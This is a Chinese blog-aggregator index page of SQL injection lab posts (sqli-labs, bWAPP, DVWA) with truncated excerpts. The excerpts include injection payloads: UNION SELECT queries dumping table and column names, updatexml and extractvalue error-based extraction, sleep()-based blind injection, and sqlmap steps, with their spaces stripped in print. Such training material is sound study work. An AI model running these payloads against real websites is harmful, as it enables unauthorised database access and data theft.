E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
SQLi
SQL注入思路基础
数据库表3.1查询所有库名3.2查询表名3.3查询列名三、SQLMAP的使用1、安装2、执行3、查出数据库4、找出目前用户权限5、导出该数据库下的表6、注入得到该表的列名7、导出数据一、SQL注入环境搭建
sqli
-labs
君衍.⠀
·
2023-12-18 21:16
网络安全
渗透测试
sql
数据库
python
java
linux
Kali
SQL注入
SQL注入靶场—
sqli
-labs安装
第一步:从下面的网址下载
sqli
-labs软件包①、、下载安装phpstudy(直接解压安装即可)链接:https://pan.baidu.com/s/1X8G_qXnTXQh_S3NAF2ux_A提取码
Krismile☜
·
2023-12-18 08:23
工具安装
sql
数据库
web安全
安全
SQL注入学习(配合
SQLi
-lab靶场)
前提条件:在进行sql注入时,首先要确定网页有注入点,一般在URL地址栏中,或者含有输入框的地方会有SQL注入步骤:1、判断注入类型首先判断是什么类型的注入,用id=1and1=1和id=1and1=2判断是数字类型注入还是字符型注入如果二者都能进行正常显示界面,则为字符型注入,否则是数字型注入(小技巧:可以用id=2-1判断,如果页面显示的和id=1相同则为数字型注入,如果和id=2相同,则为字
就不做程序猿
·
2023-12-17 11:18
sql
学习
数据库
beebox靶场A3 low级别 xss通关教程(三)
脚本,然后这段代码就存在了数据库中在每次刷新后就可以看到存储的漏洞代码十三:xss存储型changesecret本关为更新密钥,在输入框内直接输入xss脚本会显示密钥已改变接下来我们访问/bWAPP/
sqli
dj445566
·
2023-12-16 16:42
xss
前端
网络安全
Web安全-SQL注入【
sqli
靶场第11-14关】(三)
★★实战前置声明★★文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。0、总体思路先确认是否可以SQL注入,使用单双引号,1/0,括号测试’"1/0),页面显示不同内容或响应长度来确定。存在SQL注入后则开始构造轮子进行验证,猜出数据库,用户名,表名,字段名,有没有文件漏洞等。为方便验证提交拦截到
大象只为你
·
2023-12-15 19:44
跟我学网安知识
web安全
网络安全
【
sqli
靶场】第六关和第七关通关思路
目录前言一、
sqli
靶场第六关1.1判断注入类型1.2观察报错1.3使用extractvalue函数报错1.4爆出数据库中的表名二、
sqli
靶场第七关1.1判断注入类型1.2判断数据表中的字段数1.3提示
Filotimo_
·
2023-12-15 09:37
网络安全
安全
web安全
网络安全
数据库
笔记
学习
青少年编程
sql注入绕过安全狗4.0
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以
sqli
-labs(Less-1)为例,绕过安全狗4.1拦截orderby4.2拦截unionselect4.3
活着Viva
·
2023-12-14 22:06
web漏洞小知识
安全
sql
web安全
python 字符串 双引号中包含双引号
先来看提供灵感的php代码:比如
sqli
-labs的Less14,源代码中首先采用字符串拼接的方法给用户输入的参数两侧增加了双引号,并赋值给变量(下图57,58行),然后把这个变量放在双引号括起来的sql
仙女象
·
2023-12-02 20:46
python
python
php
java.sql.SQLException: Locale not supported.
eate-1242969461]com.alibaba.druid.pool.DruidDataSource:createconnectionSQLException,url:jdbc:informix-
sqli
HezhezhiyuLe
·
2023-12-02 07:29
Maven
informix
jdbc
java
bug
漏洞环境靶场搭建(内含DVWA
SQLi
-LABS upload-labs等)
一、docker环境搭建(以redhat8为例,centos7命令基本一致)1、安装dockeryuminstall-ydocker-cedocker-ce-clicontainerd.iodocker-compose-plugin2、启动dockersystemctlstartdocker3、配置镜像加速vim/etc/docker/daemon.json{"registry-mirrors":
就不做程序猿
·
2023-12-01 19:12
安全
sqli
-labs 9
less-9很快啊,我们来到了第9题掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数所以也叫延时注入我们惊讶的发现原本应该报错的?id=1’都是这样的回显尝试了很多只会回显显然这题使得布尔型盲注都无法使用所以我们使用延时注入来判断语句的对错?id=1’andsleep(5)--+我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒由
八云虹
·
2023-12-01 15:09
web安全
sqli
-labs(9)
45.不会显示报错信息通过or1验证在密码处输入')or('1登录成功')unionselect1,2,3#')unionselect1,database(),3#')unionselect1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security'),3#')unionsele
许允er
·
2023-12-01 15:32
靶场
数据库
sql
mysql
web安全
SQL注入-布尔盲注
以
sqli
-labs-masterless-8关为例当我们输入id=1时,页面正常显示当我们输入id=1'或者id=-1时,页面什么都不显示使用布尔
浪久1
·
2023-12-01 05:33
web安全
sqli
-labs靶场详解(less38-less45)
堆叠注入less-38less-38?id=1'and1=1;%00成功?id=1'and1=2;%00失败不是吧这就出来了??id=1'orderby4;%00报错4列不行?id=0'unionselect1,2,3;%00显示位置为2,3?id=0'unionselect1,database(),3;%00数据库为security?id=0'unionselect1,group_concat(
网安小t
·
2023-12-01 05:00
SQL注入
sqli-labs靶场
sql
web安全
安全
网络安全
sql注入
sql注入--布尔盲注
sql注入–布尔盲注靶场:
sqli
-labs-master下载链接:靶场下载链接第8关盲注php源码';$result=mysql_query($sql);$row=mysql_fetch_array(
pakho_C
·
2023-11-30 03:36
sql
安全
php
sqli
-labs靶场详解(less32-less37)
宽字节注入原理在下方目录less-32less-33less-34less-35less-36less-37less-32正常页面?id=1'下面有提示获取到了Hint:TheQueryStringyouinputisescapedas:1\'?id=1''看来是把参数中的非法字符就加上了转义从而在数据库中只能把单引号当成普通的字符?id=1and1=1成功?id=1and1=2成功看来是字符型参
网安小t
·
2023-11-30 03:36
SQL注入
sqli-labs靶场
sql
sql注入
web安全
网络安全
安全
sqli
-labs靶场分析
sqli
-labs靶场分析1、level1单引号测试报错,为单引号闭合,且显示1多了个单引号故而为字符型注入。且未对用户输入进行任何过滤。
不要温顺地走进那个良夜
·
2023-11-29 12:51
代码审计与分析
sql
web安全
网络安全
Sqli
-Labs靶场(1--5)题详解
目录一.Less-1:GET-Errorbased-Singlequotes-String(GET-基于错误-单引号-字符串)一、判断注入点二、确认列数三、使用Unionselect进行查询四、爆破所有数据库名以及当前数据库名五、爆破security数据库内的所有表名六、爆破users表内的所有列名七、查询所有的用户名,密码二.Less-2:GET-Errorbased-Intigerbased(
神明c
·
2023-11-29 12:20
Sqli-Labs靶场通关
网络
web安全
网络安全
sqli
-labs靶场详解(less25/25a-less28/28a)
在SQL注入过程中难点就是判断注入点只要注入点确定了获取数据库数据的过程就是复制从这关开始只进行判断注入点了和代码逻辑分析了因为注入操作太简单了(不演示了)目录less-25less-25aless-26less-26aless-27less-27aless-28less-28aless-25首先正常页面说是or和and属于他们过滤一个id参数的值搞不懂先正常来判断注入点?id=1正常?id=1'
网安小t
·
2023-11-29 12:46
sqli-labs靶场
SQL注入
sql
数据库
web安全
sql注入
网络安全
sqli
-labs靶场详解(less29-less31)
less-29提示有最好的防火墙小白原因这种题型没见过先自己测试一下?id=1'tousenear''1''预计可以使用报错注入和单引号有关的注入点?id=1'and'1'='1成功?id=1'and'1'='2失败确实是单引号字符型注入点?id=1';%00id=1%27;%00获取到了%00空字符(原因就是服务器获取的url编码后的信息)?id=1';报错看来%00还是可以用的?id=0'un
网安小t
·
2023-11-29 12:43
SQL注入
sqli-labs靶场
mysql
sql
sql注入
网络安全
web安全
sqli
-labs(3)
11.看到登录框直接or1=1在hackerabar中我们可以看到这里是post传递的数据,在get中用--+来注释后面的内容因为get中#是用来指导浏览器动作的,--代表注释+是空格,所以这里用#之后就和get的一样了1'orderby2#orderby3报错联合注入1'unionselect1,2#1‘unionselectdatabase(),2#1'unionselect1,group_c
许允er
·
2023-11-28 22:14
靶场
sql
数据库
sqli
-labs靶场详解less-24(二次注入)
less-24对于一个像我一样的小白来说这关就像php代码审计一开始进行判断注入点的时候怎么都找不到一点思路都没有只能搜教程说是二次注入从来没遇见的题型于是从代码审计开始先说一下什么叫二次注入二次注入二次注入是指通过SQL语句存储到数据库的用户输入被读取后再次被SQL语句执行导致的注入。原理在第一次进行数据库插入数据的时候,仅仅只是使用了个别函数对其中的特殊字符进行了转义,在后端代码中可能被转义,
网安小t
·
2023-11-28 14:39
SQL注入
sqli-labs靶场
安全
web安全
sql
网络安全
安全性测试
sqli
-labs靶场详解(less11-less16)
目录less-11less-12less-13less-14less-15less-16提交参数后动态参数不存在url中存在于post表单中于是在表单中进行注入点测试先看一看这种提交数据的关卡输入提交后会有什么反应uname=admin&passwd=admin&submit=Submit输出username=adminpassword=adminuname=123&passwd=123&subm
网安小t
·
2023-11-28 14:09
SQL注入
sqli-labs靶场
数据库
sql
web安全
安全
网络安全
sqli
-labs靶场详解(less17-less22)
目录less-17less-18less-19less-20less-21less-22less-17修改密码关卡服务器后端账号密码都存在数据库中使用UPDATE进行修改密码尝试username处尝试好久尝试不出来应该是对用户名进行了过滤于是对password进行注入判断注入点passwd=admin'报错:tousenear'admin''passwd=admin'and1=1#显示成功修改密码
网安小t
·
2023-11-28 14:04
SQL注入
sqli-labs靶场
sql
web安全
安全
网络安全
数据库
sqli
-labs(4)
17.观察页面发现是一个用来更改用户密码的页面,页面中出现了用户Dhakkanuser输入Dhakkanpasss输入1发现成功找注入点先在user尝试,发现不管输入什么都失败在pass中尝试注入在pass中输入1‘报错注入1'andextractvalue(1,concat(0x5c,database()))#1'andupdatexml(1,concat(0x7e,database(),0x7
许允er
·
2023-11-28 14:37
靶场
mysql
数据库
web安全
sqli
-labs第八关-布尔注入
文章目录布尔注入一、第八关爆数据库名判断长度爆破数据库名爆表名判断表的长度判断第一个表的长度判断表的字符爆字段获取字段列数获取字段列名获取表中的数据获取条数判断数据长度判断长度判断数据总结布尔注入如果页面既没有显示位,也没有报错提示的话,可以使用布尔注入.通过插入一些语句查看结果来判断是否存在布尔注入.布尔注入的几个常用函数函数使用:length(selectdatabase())>5#lengt
唤变
·
2023-11-27 20:48
sql
MySQL数据库SQL注入靶场
sqli
通关实战(附靶场安装包)
一、SQL注入概述1、SQL注入概述SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入必要条件:带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通
wespten
·
2023-11-27 20:44
全栈网络安全
渗透测试
代码审计
网络安全工具开发
数据库
mysql
sql
Sqli
-labs 靶场通关学习记录
Less-1#0x01联合注入(0x01—0x04)sql查询语句$sql="SELECT*FROMusersWHEREid='$id'LIMIT0,1";单引号闭合绕过拼接方式为id=’$id’获取数据库?id=-1'unionselect1,2,database()--+–>返回WelcomeDhakkanYourLoginname:2YourPassword:security获取表单?id=
ey404
·
2023-11-27 20:12
SQL注入
数据库
sql
dba
解密
sqli
靶场第一关:一步一步学习 SQL 注入技术
目录一、判断是否存在注入点二、构造类似?id=1'--+的语句三、判断数据表中的列数四、使用union联合查询五、使用group_concat()函数六、爆出数据库中的表名七、爆出users表中的列名八、爆出users表中的数据嗨!我是Filotimo__。很高兴与大家相识,希望我的博客能对你有所帮助。欢迎大家给我点赞、收藏⭐️,并在留言区与我互动,这些都是我前进的动力!我的格言:森林草木都有自己
Filotimo_
·
2023-11-27 20:39
网络安全
学习
安全
web安全
网络安全
数据库
青少年编程
学习方法
什么是sql注入?如何避免?
SQL注入(
SQLi
)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。
Upaaui
·
2023-11-27 07:49
#
SQL
sql
数据库
合并两个集合
*/voidUnionList(
SqLi
热爱艺术的程序员
·
2023-11-27 04:40
算法
线性表
集合合并
ctfshow sql注入171-187
sqli
借此机会多学点sql语句,看看别人的语句是否奇妙web171$sql="selectusername,passwordfromuserwhereusername!
1-1A0
·
2023-11-25 12:20
CTF
sql
数据库
sqli
-labs关卡18(基于http头部报错盲注)通关思路
文章目录前言一、靶场通关需要了解的知识点1、什么是http请求头2、为什么http头部可以进行注入二、靶场第十八关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、靶场通关需要了解的知识点1、什么是http请求头2、为什么ht
无名小卒且不会安全的zzyyhh
·
2023-11-19 11:17
http
网络协议
网络
web安全
sql
【PHP代码注入】PHP代码注入漏洞
SQLi
是将SQL语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏
百事都可樂.
·
2023-11-19 06:46
Web漏洞
PHP代码注入漏洞
PHP代码执行漏洞
PHP常见的代码执行函数和语句
PHP代码执行漏洞利用
PHP代码执行漏洞防御
sqli
-labs(Less-5) updatexml闯关
updatexml()-Xpath类型函数1.确定注入点闭合方式确认为字符型注入2.爆出当前数据库的库名http://127.0.0.1/sqlilabs/Less-5/?id=1'andupdatexml('~',concat('~',(selectdatabase())),'~')--+3.爆出当前用户名http://127.0.0.1/sqlilabs/Less-5/?id=1'andupd
Star abuse
·
2023-11-19 05:13
sqli-labs
安全
网络安全
sqli
-labs Less-23(
sqli
-labs闯关指南 23)—Advanced injection
这边来到了
sqli
-labs的第二大部分—Advancedinjection(高级注入),这一部分中将会陆续介绍一些更为巧妙的注入技巧。基于错误的,过滤注释的GET型首先进行注入的判断:分别输入?
景天zy
·
2023-11-19 05:04
sqli-lab靶场
安全
数据库
sql
web安全
sqli
-labs闯关记录(Less11-Less15)
BasicInjectionLess-11ErrorBased-StringLess-12ErrorBased-DoubleLess-13DoubleInjection-String-withtwistLess-14DoubleInjection-Doublequotes-StringLess-15Blind-BoolianBased-StringLess-11ErrorBased-String这
BROTHERYY
·
2023-11-19 05:30
靶场练习
sqli
-labs(Less-4) extractvalue闯关
extractvalue()-Xpath类型函数1.确认注入点如何闭合的方式2.爆出当前数据库的库名http://127.0.0.1/sqlilabs/Less-4/?id=1")andextractvalue(1,concat('~',(selectdatabase())))--+3.爆出当前数据库的表名http://127.0.0.1/sqlilabs/Less-4/?id=1")andext
Star abuse
·
2023-11-19 05:29
sqli-labs
网络安全
web安全
sqli
-labs(Less-3)
1.通过构造id=1’和id=1’)和id=1’)–+确定存在注入可知原始url为id=(‘1’)2.使用orderby语句猜字段数http://127.0.0.1/sqlilabs/Less-3/?id=1')orderby4--+http://127.0.0.1/sqlilabs/Less-3/?id=1')orderby3--+3.使用联合查询unionselecthttp://127.0.
Star abuse
·
2023-11-19 04:59
sqli-labs
网络安全
web安全
sqli
-labs关卡19(基于http头部报错盲注)通关思路
文章目录前言一、回顾上一关知识点二、靶场第十九关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、回顾上一关知识点上一关我们通过http头部的user-agent值进行注入,了解了http头部的一些常见可以注入的地方。这一关同
无名小卒且不会安全的zzyyhh
·
2023-11-19 04:27
http
网络协议
网络
web安全
sql
sqli
-labs关卡20(基于http头部报错盲注)通关思路
文章目录前言一、回顾上一关知识点二、靶场第二十关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、回顾上一关知识点通过上一关的referer字段的注入,我们更加熟悉了http头部注入。这一关也是http头部注入,只是换地方了二
无名小卒且不会安全的zzyyhh
·
2023-11-19 04:27
http
网络协议
网络
web安全
sql
sqli
-labs关卡14(基于post提交的双引号闭合的报错注入)通关思路
文章目录前言一、回顾上一关知识点二、靶场第十四关通关思路1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!`一、回顾上一关知识点上一关是典型的布尔盲注或可以报错盲注。二、靶场第十四关通关思路1、判断注入点2、爆显位3、爆数据库名
无名小卒且不会安全的zzyyhh
·
2023-11-19 04:57
sqli-labs靶场
web安全
sql
sqli
-labs靶场15-19关通关笔记中总结
第十五关本关属于时间注入,基于源码分析,闭合字符是单引号。本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了sql语句。那这里对id进行‘id’的处理。本关我们利用延时注入进行。uname=admin'andIf(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit正确的时候可以直接登录,
追风--白猫
·
2023-11-13 21:23
sql
sqli
-labs关卡13(基于post提交的单引号加括号的报错盲注)通关思路
文章目录前言一、回顾第十二关知识点二、靶场第十三关通关思路1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、回顾第十二关知识点通过第十二关的学习,我们了解到post注入的基本流程,其实和get注入相差不大,只是注入的地方不一
无名小卒且不会安全的zzyyhh
·
2023-11-13 21:45
sqli-labs靶场
sql
web安全
sql注入(3)
sqli
-labs1-4
目录1.less-1基于错误的GET单引号字符型注入1.1判断注入点1.2猜字段数1.3判断显示位1.4信息搜集1.5数据收集1.5.1爆破表名1.5.2爆破列名1.5.3爆破users表2.less-2基于错误的GET整形注入2.1注入点判断3.less-3基于错误的GET单引号变形字符型注入3.1注入点的判断4.less-4基于错误的GET双引号字符型注入4.1注入点判断1.less-1基于错
c10udy_
·
2023-11-13 19:09
web安全杂记
网络安全
sqli
-labs 1-10(GET型注入)新手通关详解(高手误入)
目录1.
sqli
-labs第一关2.
sqli
-labs第二关3.
sqli
-labs第三关4.
sqli
-labs第四关5.
sqli
-labs第五关6.
sqli
-labs第六关7.
sqli
-labs第七关8
b1n-7998
·
2023-11-13 19:08
数据库
Sqli
-labs 1-15
Less-1基于单引号的字符型注入注入语句:id=1'and1=1--a1、判断注入点:2、把1=1改成1=2,不报错也不显示任何信息,说明可以利用’字符注入3、确定注入字符后,判断有多少列,超出列数会报错id=1'orderby4---4、判断数据显示点(id一定要改为不存在的数)id=520'unionselect1,database(),3---5、然后便可在注入字符后加入前面的sql注入基
南冥~
·
2023-11-13 19:35
安全
sqli
-labs 1~10关教程
sqlli-labs1~10关教程本篇有点长,建议使用目录查看自己想看的关卡第一关输入?id=1出现如下图输入id=1’出现语法错误表示这里可能出现sql注入漏洞进一步尝试输入id=1’--+发现回显正常用orderby判断该语句有几列数据?id=1’orderby3--+orderby3回显正常orderby4显示错误证明有三列数据具体解释见:https://blog.csdn.net/m0_4
Day_0713
·
2023-11-13 19:03
安全
BUUCTF-
sqli
-labs1
根据题目内容他让我们(请输入id作为带数值的参数)这里面我用了sqlmap工具来进行解题。在里面输入pythonsqlmap.py-u+(网站名)(记住在网站名后面要加入?id=1)--dbs#获取数据库这样我们就可以获得数据库中的名称了。下面我们就要看数据库中的表明了。pythonsqlmap.py-u+(网站名)-D数据库名--tables#列出表名我们知道了表名,下面我们就要爆出字段名。py
Nothing-one
·
2023-11-13 19:33
sqli-labs
sql
sqli
-labs(1)
1.当id为1的时候回显正常通过‘发现报错,验证sql注入存在--+可以正常注释后面的内容,通过orderby查询有几列数据当查询4列的时候发现错误得到有3列的信息这里的id为-1,-1的数据不会存在给后面查询的1,2,3留下了显示位,正常为1时2,3的显示位为查询出的结果unionselect联合查询找回显位置在2的位置替换为我们要查询的语句database()查询当前的数据库group_con
许允er
·
2023-11-13 19:29
靶场
sql
数据库
安全
上一页
1
2
3
4
5
6
7
8
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他